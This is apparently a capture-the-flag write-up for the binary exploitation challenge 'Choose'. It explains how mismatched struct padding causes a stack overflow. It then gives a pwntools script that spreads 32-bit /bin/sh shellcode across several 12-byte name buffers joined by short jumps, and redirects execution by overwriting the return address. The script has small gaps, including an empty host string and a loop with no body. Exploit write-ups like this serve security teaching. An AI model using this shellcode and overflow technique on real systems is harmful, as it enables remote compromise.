Choose (final challenge)

Writeup by hgarrereyn

  • Binary Exploitation
  • 150 points
  • Description: Unhappy that you can't choose which enemies to fight? Choose your own adventure! Source. Connect on ASLR is not enabled.


This program allowed the user to specify 11 enemy types to fight and assign each a 12 char name. Then the user could fight each of these enemies and win various things.

After that, the user must fight a dragon that was hardcoded to be completely unbeatable.

However, in order to get the flag, you had to exploit the program to be able to get a shell remotely.


The vulnerability was a wrong assumption that a group of structs were the same size in memory. Specifically, the programmer assumed that these structs were the same size (0x14 bytes):

#define ENEMNAMELEN 12

typedef struct _orc{
    char type;
    short damage;
    int health;
    char name[ENEMNAMELEN];
} orc;

typedef struct _unicorn{
    char type;
    int health;
    short damage;
    char name[ENEMNAMELEN];
} unicorn;

Although both structs contain the same fields with the same types, they are specified in a different order. Therefore, due to struct packing the unicorn struct actually occupies 0x18 bytes. The memory structures are as follows:

orc (0x14 bytes):

[ type ][ xxxx ][ damage       ]
[ health                       ]
[ name                         ]
[ name                         ]
[ name                         ]

unicorn (0x18 bytes):

[ type ][ xxxxxxxxxxxxxxxxxxxx ]
[ health                       ]
[ damage       ][ xxxxxxxxxxxx ]
[ name                         ]
[ name                         ]
[ name                         ]

Notice how the unicorn struct is unable to pack the char and short fields into one 4-byte space because the int health must be aligned.

Then later, the following array was created to store user-controlled enemy struct data:

#define NUMMONSTERS 11
#define ENEMSIZE sizeof(orc)


This error allowed an attacker to craft an input that caused a buffer overflow onto a saved return address. For example, if the attacker specified all unicorns, the storage functions would overflow the enemies array.

The return address could be overwritten with the address of shellcode placed on the stack.

ASLR was disabled so it was possible to hard-code the stack address that held our shellcode. However, in order to find it, you could simply use existing functionality in the program. See the following lines:

void printEnemy(char * enemy){
        printf("Your sight shows the enemy at %p\n", enemy);

So if we had wizardSight, the program would print out stack addresses. How do we get that?

void processWinnings(char type){
        case 'T':
        case 't':
            printf("You found %s\n", winnings[5]);
            ctfer.wizardSight = 1;

Ok, so in order to get a stack address, we simply have to fight a troll and beat it. Then we can calculate the offset to the first name buffer where we will store our shellcode.

However, we quickly run into a problem: the name buffer only stores 12 bytes and there is no way we can fit exexcve shellcode into that small a buffer. However, we have 11 name buffers to use.

My solution was to use something I call "leapfrog shellcode" for lack of a better name. Basically, I split the shellcode into <10 byte sections (making sure to keep instructions intact). Then I appended short jump instructions that would jump to the next name buffer where execution could continue.

In memory that looked like this:

enemy 1:  [junk]
          [shellcode]      <-- start address
          [shellcode jmp] -.
enemy 2:  [junk]           |
          [junk]           | skip the struct junk
          [junk]           |
          [shellcode] <----'
          [shellcode jmp]



# By Harrison Green <hgarrereyn>

from pwn import *

# Found on

# Shellcode (/bin/sh on 32 bit)
# 08048060 <_start>:
 # 8048060: 31 c0                 xor    %eax,%eax
 # 8048062: 50                    push   %eax
 # 8048063: 68 2f 2f 73 68        push   $0x68732f2f
 # 8048068: 68 2f 62 69 6e        push   $0x6e69622f
 # 804806d: 89 e3                 mov    %esp,%ebx
 # 804806f: 89 c1                 mov    %eax,%ecx
 # 8048071: 89 c2                 mov    %eax,%edx
 # 8048073: b0 0b                 mov    $0xb,%al
 # 8048075: cd 80                 int    $0x80
 # 8048077: 31 c0                 xor    %eax,%eax
 # 8048079: 40                    inc    %eax
 # 804807a: cd 80                 int    $0x80

# Relative jump:
#  EB CB - where CB is a signed integer to be added to eip

# Modified leapfrog shellocode with added short jumps:

### Name 1
# 31 c0
# 50
# 68 2f 2f 73 68
name1 = '\x31\xc0\x50\x68\x2f\x2f\x73\x68' + '\xeb\x0e'

### Name 2
# 68 2f 62 69 6e
# 89 e3
# 89 c1
name2 = '\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1' + '\xeb\x0d'

### Name 3
# 89 c2
# b0 0b
# cd 80
# 31 c0
name3 = '\x89\xc2\xb0\x0b\xcd\x80\x31\xc0' + '\xeb\x0e'

### Name 4
# 40
# cd 80
name4 = '\x40\xcd\x80'

# Heap layout:
# <name 1 : 12 bytes>
# <junk : 12 bytes>
# <name 2 : 12 bytes> ...

sock = remote('', 47601)

# Select 11 unicorns
sock.send(('u\n' * 11))

# Add shellcode
sock.send(name1 + '\n')
sock.send(name2 + '\n')
sock.send(name3 + '\n')
sock.send(name4 + '\n')

# Fill the rest of the names
for i in range(6):

# jump to shellcode by overwriting the return address with 0xffffdb9a
sock.send('aa' + '\x9a\xdb\xff\xff' + '\n')

# flee unicorns
sock.send(('f\n' * 11))

# flee dragon
sock.send(('f\n' * 6))

# Game exits but actually jumps to shellcode

# We've got shell

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